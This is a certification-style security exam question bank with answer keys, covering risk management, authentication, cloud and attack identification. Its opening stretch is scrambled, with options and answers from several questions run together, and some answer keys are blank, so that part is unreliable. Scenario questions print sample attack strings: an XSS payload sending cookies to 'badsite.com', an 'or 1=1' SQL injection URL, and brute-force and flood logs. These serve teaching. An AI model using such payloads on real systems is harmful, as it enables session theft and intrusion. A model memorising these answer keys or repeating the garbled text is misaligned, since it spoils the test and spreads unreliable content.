All software products will continue to go through new development in the coming year. Contact senior finance management and provide background information .B. Discuss the issue with the software product's user groups B. Fault injection. CSRF. Knowing this. The memo also stated that the marketing material and service level agreement for each product would remain unchanged. Windows C. Memory leaks Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 18 A company sales manager received a memo from the company's financial department which stated that the company would not be putting its software products through the same security testing as previous years to reduce the research and development cost by 20 percent for the upcoming year. CSRF. Consult the company's legal department on practices and law C. Privilege escalation D. Application DoS. The sales manager has reviewed the sales goals for the upcoming year and identified an increased target across the software products that will be affected by the financial department's change. Which of the following should the sales manager do to ensure the company stays out of trouble? A. Resource exhaustion. Insecure direct object references. Buffer overflow C. SQL injection. Smurf B. which of the following correctly orders various vulnerabilities in the order of MOST important to LEAST important? A. Solaris D. Privilege escalation. OSX Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 17 A government agency considers confidentiality to be of utmost importance and availability issues to be of least importance.

.1" 200 5724 The security administrator also inspects the following file system locations on the database server using the command `ls -al /root' drwxrwxrwx 11 root root 4096 Sep 28 22:45 . HTTP/1./.bash_history -rw------.165.1" 200 5724 90.sh G..profile -rw------. drwxr-xr-x 25 root root 4096 Mar 8 09:30 . Brute force attack C. Privilege escalation B. SQL injection D./.bash_history HTTP/1. Implement the following PHP directive: $clean_user_input = addslashes($user_input) H..25 root root 4096 Mar 8 09:30 . Seek industry outreach for software practices and law Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 19 The security administrator finds unauthorized tables and records. which were not present before. Cross-site scripting E.76.165.25 root root 4096 Mar 8 09:30 . The database server communicates only with one web server. on a Linux database server. -rws-----.76.[08/ Mar/2014:10:54:04] "GET calendar..D.bash_history -rw------.1" 200 5724 90.php?create%20table%20hidden HTTP/1.ssh Which of the following attacks was used to compromise the database server and what can the security administrator implement to detect such attacks in the future? (Select TWO).Creat<. ensure the following characters are sanitized: <> F.25 root root 4096 Mar 8 09:30 . Set an account lockout policy Correct Answer: AF Section: (none) Explanation Explanation/Reference: .25 root root 4096 Mar 8 09:30 . Web server logs show the following: 90./scrip>.40 .40 .[08/Mar/2014:10:54:05] "GET . Update crontab with: find / \( -perm -4000 \) type f print0 | xargs -0 ls l | email.165.scrip>. which connects to the database server via an account with SELECT only privileges. A.40 ./root/.76. Using input validation.[08/Mar/2014:10:54:04] "GET index.php?user<.

B. and the subsidiaries becoming an SP. They are currently installing fiber-to-the-home in many areas with hopes of also providing telephone and Internet services. Create a proposal and present it to management for approval. D. Construct a series of VMs to host the malware environment. The companies should federate. and customer authentication. with the parent becoming the SP. However all three companies must share customer data for the purposes of accounting. B. and the subsidiaries becoming an IdP. and be simple and seamless for customers. and the subsidiaries becoming an SSP. with the parent becoming the ASP. The board of directors wishes to keep the subsidiaries separate from the parent company. The companies should federate. The companies should federate. Which of the following solutions is BEST suited for this scenario? A. billing. The telephone and Internet services portions of the company will each be separate subsidiaries of the parent company. C. The companies should federate. Correct Answer: C Section: (none) Explanation Explanation/Reference: . The solution must use open standards. C. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 21 Company XYZ provides cable television service to several regional areas. with the parent becoming the IdP. D. and the subsidiaries becoming an IdP. Develop a policy to outline what will be required in the secure lab. Purchase new hardware to keep the malware isolated. Which of the following is the NEXT step that the security team should take? A. while only sharing minimal data between the companies. with the parent becoming the IdP.QUESTION 20 A member of the software development team has requested advice from the security team to implement a new secure lab for testing malware.

Mitigate D. C.QUESTION 22 The Chief Information Security Officer (CISO) at a company knows that many users store business documents on public cloud-based storage. likelihood of exploitability. Transfer Correct Answer: Section: (none) Explanation Explanation/Reference: QUESTION 23 A completely new class of web-based vulnerabilities has been discovered. Attempt to exploit via the proof-of-concept code. Which of the following risk strategies did the CISO implement? A. In response. Proof-of. B. Which of the following BEST describes how the security advisor should respond? A.concept details have emerged on the Internet. Advise management of any `high' or `critical' penetration test findings and put forward recommendations for mitigation. Notify all customers about the threat to their hosted data. Hire an independent security consulting agency to perform a penetration test of the web servers. Correct Answer: A Section: (none) Explanation Explanation/Reference: . and realizes this is a risk to the company. Bring the web servers down into "maintenance mode" until the vulnerability can be reliably mitigated through a vendor patch. and impact to hosted data. the CISO implements a mandatory training course in which all employees are instructed on the proper use of cloud-based storage. A security advisor within a company has been asked to provide recommendations on how to respond quickly to these vulnerabilities. Avoid B. Assess the reliability of the information source. Claims have been made that all common web-based development frameworks are susceptible to attack. Respond to management with a recommendation to wait until the news has been independently verified by software vendors providing the web application software. Consider remediation options. Accept C. Review vulnerability write-ups posted on the Internet. D.

Establish deduplication across diverse storage paths. separation of duties D. D. The current storage method is a single NAS used by all servers in both datacenters. running as local admin. with split staff/guest wireless functionality. as well as deployment of VDI for all client computing needs. collusion Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 25 The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. an administrative control B. Replicate NAS changes to the tape backups at the other datacenter. C. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 26 An organization is concerned with potential data loss in the event of a disaster. The CISO is concerned that an unrecognized threat could compromise corporate data and result in regulatory fines as well as poor corporate publicity. and created a backup datacenter as a mitigation strategy. Ensure each server has two HBAs connected through two routes to the NAS. Behavior based IPS with a communication link to a cloud based vulnerability and threat feed. B. with push technology for definition updates. Which of the following equipment MUST be deployed to guard against unknown threats? A. with direct control of the perimeter firewall ACLs. The network is mostly flat.QUESTION 24 A software project manager has been provided with a requirement from the customer to place limits on the types of transactions a given user can initiate without external interaction from another user with elevated privileges. B. least privilege E. segregated on a management VLAN. Which of the following options increases data availability in the event of a datacenter failure? A. This requirement is BEST described as an implementation of: A. Host based heuristic IPS. Implementation of an offsite data center hosting all company data. Cloud-based antivirus solution. . C. dual control C.

Split-tunnel VPN should be enforced when transferring sensitive data. Full-drive file hashing should be implemented with hashes stored on separate storage. NTLM C. Full-tunnel VPN should be required for all network communication. The company is using Active Directory Federated Services for their directory service. Correct Answer: BD Section: (none) Explanation Explanation/Reference: QUESTION 28 An organization would like to allow employees to use their network username and password to access a third-party service. D. Kerberos . OAUTH D. E. SAML C. C. B. A. Which of the following should the company ensure is supported by the third-party? (Select TWO). LDAP/S B. Which of the following additional controls MUST be implemented to minimize the risk of data leakage? (Select TWO). Strong authentication should be implemented via external biometric devices. F. A full-system backup should be implemented to a third-party provider with strong encryption for data in transit. A DLP gateway should be installed at the company border. A.Correct Answer: Section: (none) Explanation Explanation/Reference: QUESTION 27 A security administrator wants to prevent sensitive data residing on corporate laptops and desktops from leaking outside of the corporate network. The company has already implemented full-disk encryption and has disabled all peripheral devices on its desktops and laptops.

Which of the following methods of software development is this organization's configuration management process using? A. a hacker. Click-jacking C. The vendor has been in constant communication with personnel and groups within the organization to understand its business process and capture new software requirements from users. Agile B. Which of the following BEST describes the application issue? A. SDL C. Integer overflow B. SQL injection E. has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution in the context of the victim's privilege level. stating that the organization needs everything to work completely. Joint application development Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 30 Joe. and the vendor should already have those desires built into the software product. The Chief Information Office has become increasingly frustrated with frequent releases. The browser crashes due to an exception error when a heap memory that is unused is accessed. Use after free . Waterfall D.Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 29 A mature organization with legacy information systems has incorporated numerous new processes and dependencies to manage security as its networks and infrastructure are modernized. Race condition D.

firstname.C. Cross-site scripting D. Aligning their client intake with the resources available C. XML injection B. lastname from authors User input= firstname= Hack. they do not have the resources or the scalability to adequately serve their clients. While the business is lucrative. SQL injection Correct Answer: D Section: (none) Explanation . Outsourcing the service to a third party cloud provider Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 32 select id. which of the following scenarios should they consider? A. Command injection C.man lastname=Johnson Which of the following types of attacks is the user attempting? A. Since it is an e-discovery firm where chain of custody is important. Offload some data processing to a public cloud B. Input validation Correct Answer: Section: (none) Explanation Explanation/Reference: QUESTION 31 A forensic analyst works for an e-discovery firm where several gigabytes of data are processed daily. Using a community cloud with adequate controls D.

Port scanner F. This gap is resulting in an above average number of security-related bugs making it into production. HIDS E. which of the following can the network administrator use to detect the presence of a malicious actor physically accessing the company's network or information systems from within? (Select TWO). In addition to the company's physical security. Vulnerability scanner C. HTTP intercept D. Scrum D. Which of the following development methodologies is the team MOST likely using now? A. The team currently suffers from poor communication due to a long delay between requirements documentation and feature delivery. Spiral Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 35 Which of the following BEST constitutes the basis for protecting VMs from attacks from other VMs hosted on the same physical platform? . Agile B. A. Waterfall C. RAS B. Protocol analyzer Correct Answer: DF Section: (none) Explanation Explanation/Reference: QUESTION 34 A software development manager is taking over an existing software development project.Explanation/Reference: QUESTION 33 A network administrator with a company's NSP has received a CERT alert for targeted adversarial behavior at the company.

Aggressive patch management on the host and guest OSs. so the risk at work is no different. Host based IDS sensors on all guest OSs. Which of the following BEST explains why this company should proceed with protecting its corporate network boundary? A. Ensure the SaaS provider supports encrypted password transmission and storage. Ensure the SaaS provider supports secure hash file exchange. The aggregation of employees on a corporate network makes it a more valuable target for attackers. Home networks are unknown to attackers and less likely to be targeted directly. B. Unique Network Interface Card (NIC) assignment per guest OS. B. Which of the following ensures the organization mitigates the risk of managing separate user credentials? A. in house Customer Resource Management (CRM) application. Different antivirus solutions between the host and guest OSs. Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 36 The Chief Executive Officer (CEO) of a company that allows telecommuting has challenged the Chief Security Officer's (CSO) request to harden the corporate network's perimeter. Ensure the SaaS provider supports dual factor authentication. C. C. B. . D.A. Employees are more likely to be using personal computers for general web browsing when they are at home. The CEO argues that the company cannot protect its employees at home. Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 37 An organization is selecting a SaaS provider to replace its legacy. The corporate network is the only network that is audited by regulators and customers. D. C.

we do not allow employees to work from home but this is something I am willing to allow so we can get back on track. which of the following would be the MOST appropriate response to the CFO? A.location='http://badsite. E. C. Allow VNC access to corporate desktops from personal computers for the users working from home. Correct Answer: E Section: (none) Explanation Explanation/Reference: QUESTION 38 A security manager has received the following email from the Chief Financial Officer (CFO): "While I am concerned about the security of the proprietary financial data in our ERP application. As things currently stand. Ensure the SaaS provider supports role-based access control.getParameter('><script>document. D. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 39 A security administrator notices the following line in a server's security log: <input name='credentials' type='TEXT' value='" + request. Ensure the SaaS provider supports directory services federation. What should we do first to securely enable this capability for my group?" Based on the information provided. B.cooki e</script>') + "'. Work with the executive management team to revise policies before allowing any remote access. The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server.D. Which of the following should the security administrator implement to prevent this particular attack? . Allow terminal services access from personal computers after the CFO provides a list of the users working from home. we have had a lot of turnover in the accounting group and I am having a difficult time meeting our monthly performance targets.com/?q='document. Remote access to the ERP tool introduces additional security vulnerabilities and should not be allowed.

Input validation C. Physical penetration test of the datacenter to ensure there are appropriate controls. A. Sandboxing E. The procurement department has asked what security activities must be performed for the deal to proceed. It will host the entire organization's customer database. B. . Which of the following are the MOST appropriate security activities to be performed as part of due diligence? (Select TWO). Review the firewall rule set and IPS logs Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 41 A company is in the process of outsourcing its customer relationship management system to a cloud provider. Security clauses are implemented into the contract such as the right to audit. The database will be accessed by both the company's users and its customers. DAM Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 40 An insurance company is looking to purchase a smaller company in another country. Which of the following tasks would the security administrator perform as part of the security due diligence? A. SIEM D. Perform a network penetration test B. Review switch and router configurations B. C. Review the security policies and standards C. WAF B. Penetration testing of the solution to ensure that the customer data is well protected.A.

The ISO is required to submit a policy exception form to the Chief Information Officer (CIO). Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 42 The Chief Information Officer (CIO) is reviewing the IT centric BIA and RA documentation. C. Industry best practices with respect to the technical implementation of the current controls. the company will be unable to implement the requirement for the next two years. Which of the following are MOST important to include when submitting the exception form? (Select THREE). The documentation shows that a single 24 hours downtime in a critical business function will cost the business $2. Business or technical justification for not implementing the requirements. the business unit which depends on the critical business function has determined that there is a high probability that a threat will materialize based on historical data. the ISO identifies a new requirement to implement two-factor authentication on the company's wireless system. Risks associated with the inability to implement the requirements.3 million. Upon review. nor does it allow for the purchase of additional compensating controls. B. Additionally. The CIO's budget does not allow for full system hardware replacement in case of a catastrophic failure. Review of the organizations security policies. The company should mitigate the risk. procedures and relevant hosting certifications. D. . Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 43 The Information Security Officer (ISO) is reviewing new policies that have been recently made effective and now apply to the company. Code review of the solution to ensure that there are no back doors located in the software. The company should transfer the risk. Due to budget constraints. C. C. Which of the following should the CIO recommend to the finance director to minimize financial loss? A. A. The company should avoid the risk. B.B. The company should accept the risk.

Perform black box penetration testing over the solution D. The RFP explicitly calls for all possible behaviors of the product to be tested. it does not specify any particular method to achieve this goal. Which of the following security activities should be implemented as part of the SDL in order to provide the MOST security coverage over the solution? (Select TWO). A. Grey box testing D. F. the goal is to provide them with more self service functionality. Perform code review over a sampling of the front end source code C. Code signing E. Current and planned controls to mitigate the risks. however. White box testing Correct Answer: AE Section: (none) Explanation Explanation/Reference: QUESTION 45 A company is in the process of implementing a new front end user interface for its customers. Internal procedures that may justify a budget submission to implement the new requirement. E. Perform grey box penetration testing over the solution E. All sections of the policy that may justify non-implementation of the requirements. Penetration testing C. G. Perform unit testing of the binary code B. Code review B. Correct Answer: ABG Section: (none) Explanation Explanation/Reference: QUESTION 44 A security firm is writing a response to an RFP from a customer that is building a new network based software product. Which of the following should be used to ensure the security and functionality of the product? (Select TWO). Perform static code review over the front end source code Correct Answer: DE Section: (none) Explanation . A revised DRP and COOP plan to the exception form. The firm's expertise is in penetration testing corporate networks. A. The application has been written by developers over the last six months and the project is currently in the test phase.D.

Explanation/Reference: QUESTION 46 An analyst connects to a company web conference hosted on www. Authenticated users could sponsor guest access that was previously approved by management C.000 systems is vulnerable to a buffer overflow attack. D. Validate and deploy the appropriate patch. Which of the following security concerns does the analyst present to management? A. Run the application in terminal services to reduce the threat landscape. Correct Answer: B Section: (none) Explanation Explanation/Reference: . without providing identifying information.com/meetingID#01234 and observes that numerous guests have been allowed to join. Deploy custom HIPS signatures to detect and block the attacks.webconference. The topics covered during the web conference are considered proprietary to the company. Unauthenticated users could present a risk to the confidentiality of the company's information D. Guest users could present a risk to the integrity of the company's information B. Deploy custom NIPS signatures to detect and block the attacks. Meeting owners could sponsor guest access if they have passed a background check Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 47 An application present on the majority of an organization's 1. B. C. Which of the following is the MOST comprehensive way to resolve the issue? A.

C. This tool should allow remote desktop sharing. Use the pass the hash technique B. from malware hosting websites. without impacting the integrity of any of the systems? A. Deploy a cloud-based content filter and enable the appropriate category to prevent further infections. Use the existing access to change the password D. Use social engineering to obtain the actual password Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 49 A security administrator notices a recent increase in workstations becoming compromised by malware. Which of the following methods allows the penetration tester to MOST efficiently use any obtained administrative credentials on the client organization's other systems. Which of the following solutions would provide the BEST protection for the company? A. the malware is delivered via drive-by downloads. Increase the frequency of antivirus downloads and install updates to all workstations. D. . Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 50 The helpdesk department desires to roll out a remote support application for internal use on all company computers. Deploy a web based gateway antivirus server to intercept viruses before they enter the network. B.QUESTION 48 An external penetration tester compromised one of the client organization's authentication servers and retrieved the password database. Often. Use rainbow tables to crack the passwords C. and is not being detected by the corporate antivirus. Deploy a WAF to inspect and block all web traffic which may contain malware and exploits.

The tool could enumerate backend SQL database table and column names C. What encryption standards are used in tracking database? D. Which of the following questions is the MOST important? A. The tool could show that input validation was only enabled on the client side B. What are the protections against MITM? B.system log gathering. chat. A security engineer decides to use an HTTP interceptor for testing the application. The risk management team has been asked to review vendor responses to the RFQ. and remote registry access. hardware logging. Which of the following has been . The software vendor is called in to troubleshoot the issue and reports that all core components were updated properly. The tool could fuzz the application to determine where memory leaks occur Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 52 An extensible commercial software system was upgraded to the next minor release version to patch a security vulnerability. Which of the following problems would MOST likely be uncovered by this tool? A. What snapshot or "undo" features are present in the application? E. an unauthorized intrusion into the system was detected. The tool could force HTTP methods such as DELETE that the server has denied D. After the upgrade. What accountability is built into the remote support application? C. What encryption standards are used in remote desktop and file transfer functionality? Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 51 A new web based application has been developed and deployed in production. inventory management.

They should logon to the system using the newly assigned global username: first. D. Third-party plug-ins were not patched. Correct Answer: BF Section: (none) Explanation Explanation/Reference: QUESTION 53 Two separate companies are in the process of integrating their authentication infrastructure into a unified single sign-on system. C. B. They should logon to the system using the username concatenated with the 6-digit code and their original password. Which of the following can specify parameters for the maintenance work? (Select TWO).com. both companies use an AD backend and two factor authentication using TOTP. They should use the username format: LAN\first.lastname together with their original password and the next 6-digit code displayed when the token button is depressed. F. E. Quality of service D.overlooked in securing the system? (Select TWO). Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 54 A security engineer on a large enterprise network needs to schedule maintenance within a fixed window of time.lastname@company. B. Managed security service B. Workstations can undergo maintenance from 8:00 pm to 6:00 am daily. A. The wrong version of the patch was used. A. How should the employees request access to shared resources before the authentication integration is complete? A.lastname#### where #### is the second factor code. A total outage period of four hours is permitted for servers. The patch caused the system to revert to http. Network service provider E. C. D. The company's custom code was not patched. The software patch was not cryptographically signed. together with a password and their 6-digit code. Currently. Memorandum of understanding C. Operating level agreement . They should use the username format: first. The system administrators have configured a trust relationship between the authentication backend to ensure proper process flow. The company's IDS signatures were not updated.

System interaction needs to be quick and easy. They are also concerned with data ownership questions and legal jurisdiction. Manufacturing . The information security team has been a part of the department meetings and come away with the following notes: -Human resources would like complete access to employee data stored in the application. They would like automated data interchange with the employee management application. kiosk automation. The favored solution is a user friendly software application that would be hosted onsite. custom fields. Remote attestation D. a cloud. Identity propagation C.Correct Answer: BE Section: (none) Explanation Explanation/Reference: QUESTION 55 Ann. and data encryption. -Sales is asking for easy order tracking to facilitate feedback to customers. -Quality assurance is concerned about managing the end product and tracking overall performance of the product being produced. Which of the following should Ann implement to stop modified copies of her software from running on mobile devices? A. Secure code review Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 56 Executive management is asking for a new manufacturing control and workflow automation solution.based SaaS application. Ann wants to ensure that the software will not be modified by a third party or end users before being installed on mobile devices. a software developer. It supports read-only access. Employees working the assembly line cannot be bothered with additional steps or overhead. -Manufacturing is asking for ease of use. Single sign-on B. wants to publish her newly developed software to an online store. Which of the following departments' request is in contrast to the favored solution? A. but also has readily available APIs for extensibility. This application will facilitate management of proprietary information and closely guarded corporate trade secrets. -Legal is asking for adequate safeguards to protect trade secrets. It has extensive ACL functionality. They would like read- only access to the entire workflow process for monitoring and baselining.

Move the database servers to an elastic private cloud while keeping the web servers local. to handle student registration. Move the web servers to an elastic public cloud while keeping the database servers local. Build the application according to software development security standards C. If the security engineer is only going to perform a security assessment. The web servers remain idle for the rest of the year. Establish the security control baseline B. C. Which of the following is the MOST cost effective way for the university to securely handle student registration? A. The company has two new major IT projects starting this year and wants to plan security into the application deployment. twice a year. Human resources Correct Answer: E Section: (none) Explanation Explanation/Reference: QUESTION 57 A university requires a significant increase in web and database server resources for one week. Quality assurance E. Sales D. D. The security engineer asks for a timeline to determine when a security assessment of both applications should occur and does not attend subsequent configuration board meetings. Virtualize the web servers locally to add capacity during registration. The board is primarily concerned with the applications' compliance with federal assessment and authorization standards. which of the following steps in system authorization has the security engineer omitted? A.B. B. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 58 A security engineer is a new member to a configuration board at the request of management. Review the results of user acceptance testing D. Consult with the stakeholders to determine which standards can be omitted . Legal C. Move the database servers and web servers to an elastic private cloud.

The company needs an effective communication solution to remain in constant contact with each other. Social media is an effective solution because it is easily adaptable to new situations. Implement an IPS to block the application on the network B. had deployed an unauthorized remote access application that communicated over common ports already allowed through the firewall. A network scan showed that this remote access application had already been installed on one third of the servers in the company. Which of the following decisions is BEST for the CEO to make? A. Social media is an ineffective solution because the policy may not align with the business. A junior-level administrator suggests that the company and the sales staff stay connected via free social media. Implement SSL VPN with SAML standards for federation D. B. Implement the remote application out to the rest of the servers C.Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 59 During a recent audit of servers. Social media is an effective solution because it implements SSL encryption. Social media is an ineffective solution because it is not primarily intended for business applications. Implement an ACL on the firewall with NAT for remote access Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 60 The Chief Executive Officer (CEO) of a small start-up company wants to set up offices around the country for the sales staff to generate business. while maintaining a secure business environment. Which of the following is the MOST appropriate action that the company should take to provide a more appropriate solution? A. D. Correct Answer: B . who required remote access. C. a company discovered that a network administrator.

99.51.24 percent B. which of the following calculations is the percentage of uptime assuming there were 722 hours in the month? A.72 percent Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 62 A security administrator is shown the following log excerpt from a Unix system: 2013 Oct 10 07:14:57 web14 sshd[1632]: Failed password for root from 198.100. 92.23 port 37920 ssh2 2013 Oct 10 07:16:00 web14 sshd[1642]: Successful login for root from 198. One of these situations was a two hour scheduled maintenance time.23 port 37924 ssh2 Which of the following is the MOST likely explanation of what is occurring and the BEST immediate response? (Select TWO). in four separate situations.51.51.06 percent C.23 port 37918 ssh2 2013 Oct 10 07:16:00 web14 sshd[1641]: Failed password for root from 198.23 port 37916 ssh2 2013 Oct 10 07:15:59 web14 sshd[1640]: Failed password for root from 198.100. .51.51.100.34 percent D.100.51.23 port 37915 ssh2 2013 Oct 10 07:14:58 web14 sshd[1638]: Failed password for root from 198.100. Using the MTTR based on the last month's performance figures. A security engineer has found the WAF to be the root cause of the failures. A. 98.Section: (none) Explanation Explanation/Reference: QUESTION 61 There have been some failures of the company's internal facing website.23 port 37914 ssh2 2013 Oct 10 07:14:57 web14 sshd[1635]: Failed password for root from 198. aimed at improving the stability of the WAF.100. 98. System logs show that the WAF has been unavailable for 14 hours over the past month. An authorized administrator has logged into the root account remotely.

Which of the following will meet this goal without requiring any hardware pass-through implementations? A.100. E. Running a vulnerability scanning tool to assess network and host weaknesses Correct Answer: C Section: (none) Explanation . D. TPM D.51. Attempting to perform blind SQL injection and reflected cross-site scripting attacks E.B. Use iptables to immediately DROP connections from the IP 198. C. Correct Answer: CE Section: (none) Explanation Explanation/Reference: QUESTION 63 A security architect is designing a new infrastructure using both type 1 and type 2 virtual machines. Reverse engineering any thick client software that has been provided for the test C. A remote attacker has compromised the root account using a buffer overflow in sshd. The administrator should disable remote root logins.g. Isolate the system immediately and begin forensic analysis on the host. Test password complexity of all login fields and input validation of form fields B. A remote attacker has compromised the private key of the root account. vTPM B. In addition to the normal complement of security controls (e. host hardening. A remote attacker has guessed the root password using a dictionary attack. G. F. Change the root password immediately to a password not found in a dictionary. H. HSM C.23. Undertaking network-based denial of service attacks in production environment D. antivirus. HIPS/NIDS) the security architect needs to implement a mechanism to securely store cryptographic keys used to sign code and code modules on the VMs. INE Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 64 Which of the following activities is commonly deemed "OUT OF SCOPE" when undertaking a penetration test? A.

Require each user to log passwords used for file encryption to a decentralized repository. To gain access. . a highly sensitive area. C. D. Establish a policy that only allows filesystem encryption and disallows the use of individual file encryption. Mobile device root-kit detection D. Company leadership has asked for a thorough review of physical security controls to prevent this from happening again. Extended Validation certificates Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 67 An intruder was recently discovered inside the data center. SSL certificate pinning C. SSL certificate revocation B.Explanation/Reference: QUESTION 65 A company is facing penalties for failing to effectively comply with e-discovery requests. Which of the following departments are the MOST heavily invested in rectifying the problem? (Select THREE). the intruder circumvented numerous layers of physical and electronic security measures. Permit users to only encrypt individual files using their domain password and archive all old user passwords. Allow encryption only by tools that use public keys from the existing escrowed corporate PKI. B. Man-in-the-middle attempts via a HTTP intercepting proxy are failing with SSL errors. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 66 A penetration tester is assessing a mobile banking application. Which of the following could reduce the overall risk to the company from this issue? A. Which of the following controls has likely been implemented by the developers? A.

Marketing G.A. Information technology Correct Answer: AEG Section: (none) Explanation Explanation/Reference: QUESTION 68 An industry organization has implemented a system to allow trusted authentication between all of its partners. This information can be found in global routing tables.the-middle attack. and is valuable because backup connections typically do not have perimeter protection as strong as the primary . Research and development D. Data center operations F. The system consists of a web of trusted RADIUS servers communicating over the Internet. An attacker was able to set up a malicious server and conduct a successful man-in. Use PAP for secondary authentication on each RADIUS server B. Disable unused EAP methods on each RADIUS server C. Enforce TLS connections between RADIUS servers D. Use a shared secret for each pair of RADIUS servers Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 69 A security consultant is conducting a network assessment and wishes to discover any legacy backup Internet connections the network may have. Which of the following controls should be implemented to mitigate the attack in the future? A. Human resources C. Facilities management B. Programming E. Where would the consultant find this information and why would it be valuable? A.

where customers are able to arbitrarily change the price of listed items. Which of the following denotes the BEST way to mitigate future malware risk? A. and is valuable because backup DNS servers typically allow recursive queries from Internet hosts. B. the information security department is asked to review the configuration and suggest changes to prevent this from happening again. D. which provides voice connectivity for store VoIP phones. C. and is valuable because backup connections typically have much lower latency than primary connections. B. Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 71 After being notified of an issue with the online shopping cart. Only the staff wireless network has access to the POS VPN. and is valuable because backup connections typically do not require VPN access to the network. it is determined that three store PCs are hosting malware. C. Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 70 A small retail company recently deployed a new point of sale (POS) system to all 67 stores. Each store offers guest wireless functionality. An additional split-tunnel VPN provides bi-directional connectivity back to the main office. D. Move to a VDI solution that runs offsite from the same data center that hosts the new POS solution. This information can be found by calling the regional Internet registry. This information can be found by querying the network's DNS servers. Deploy a proxy server with content filtering at the corporate office and route all traffic through it. a programmer analyzes the following . connection. Deploy new perimeter firewalls at all stores with UTM functionality. Upon investigation. which is generating excessive network traffic. This information can be found by accessing telecom billing records. Recently. accessible only from retail stores and the corporate office over a split-tunnel VPN. The core of the POS is an extranet site. After malware removal. stores are reporting poor response times when accessing the POS application from store computers as well as degraded voice quality when making phone calls. Change antivirus vendors at the store and the corporate office. as well as employee wireless.

The security administrator is concerned that someone may log on as the administrator.tmp) containing the price of the item being purchased. C. (e. Session hijacking Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 72 A developer has implemented a piece of client-side JavaScript code to sanitize a user's provided input to a web page login screen.1" 200 5724 Given this log.g.DD-YYYY. a temporary file is created on the web server /tmp directory. D.[02/Mar/2014:06:13:04] "GET /site/script. A security administrator is concerned with the following web server log: 10. The security administrator is concerned with SQL injection.piece of code used by a web based shopping cart.11 . and the developer should implement server side input validation. Input validation B.62. and that only a 6-digit PIN is entered in the password field. The security administrator is concerned with nonprintable characters being used to gain administrative access. Correct Answer: C Section: (none) Explanation . TOCTOU D. and the developer should ensure strong passwords are enforced. The programmer found that every time a user adds an item to the cart. The temporary file has a name which is generated by concatenating the content of the $USERINPUT variable and a timestamp in the form of MM. and the developer should normalize Unicode characters on the browser side. smartphone-12-25-2013. SQL injection C. which of the following is the security administrator concerned with and which fix should be implemented by the developer? A. Which of the following is MOST likely being exploited to manipulate the price of a shopping cart's items? A. and the developer should strip all nonprintable characters.php?user=admin&pass=pass%20or%201=1 HTTP/1. SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES($USERINPUT). The code ensures that only the upper case and lower case letters are entered in the username field.235. B. The security administrator is concerned with XSS.

Explanation/Reference: QUESTION 73 The Information Security Officer (ISO) believes that the company has been targeted by cybercriminals and it is under a cyber attack. an ACL should be placed on the company's external router to block incoming UDP port 19 traffic.213.176. Internal services that are normally available to the public via the Internet are inaccessible.192.19 > 128.55. The senior security engineer starts by reviewing the bandwidth at the border router.19. length 1400 Which of the following describes the findings the senior security engineer should report to the ISO and the BEST solution for service restoration? A.19: UDP. length 1400 11:16:22. length 1400 11:16:22.19 > 128.19 > 128. but each has its own partition and logical volume. Which of the following is the BEST way to ensure confidentiality of individual operating system data? A.2. After the senior engineer used a packet capture to identify an active Smurf attack. the company's ISP should be contacted and instructed to block the malicious packets.110358 IP 192.31.19. and employees in the office are unable to browse the Internet. The security engineer then inspects the following piece of log to try and determine the reason for the downtime. Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 74 A user has a laptop configured with multiple operating system installations.19: UDP.20.132.176. an IPS filter should be enabled to block the attack and restore communication.19.7.237.176. focusing on the company's external router's IP which is 128.27.176.27.19: UDP. After the senior engineer used the above IPS logs to detect the ongoing DDOS attack.176.19 > 128.110402 IP 70.20. B. The operating systems are all installed on a single SSD.200.20.19: 11:16:22. Encryption of each individual partition B. and notices that the incoming bandwidth on the router's external interface is maxed out.39.19: UDP.19 > 128. FDE of each logical volume on the SSD D.110406 IP 112.176. length 1400 11:16:22. length 1400 11:16:22.20.19.200. a BGP sinkhole should be configured to drop traffic at the source networks.20. After the senior engineer used a network analyzer to identify an active Fraggle attack.201. C.20. Encryption of the SSD at the file level C. FDE of the entire SSD as a single disk .19: UDP. D. After the senior engineer used a mirror port to capture the ongoing amplification attack.112.110351 IP 23.110343 IP 90.19.

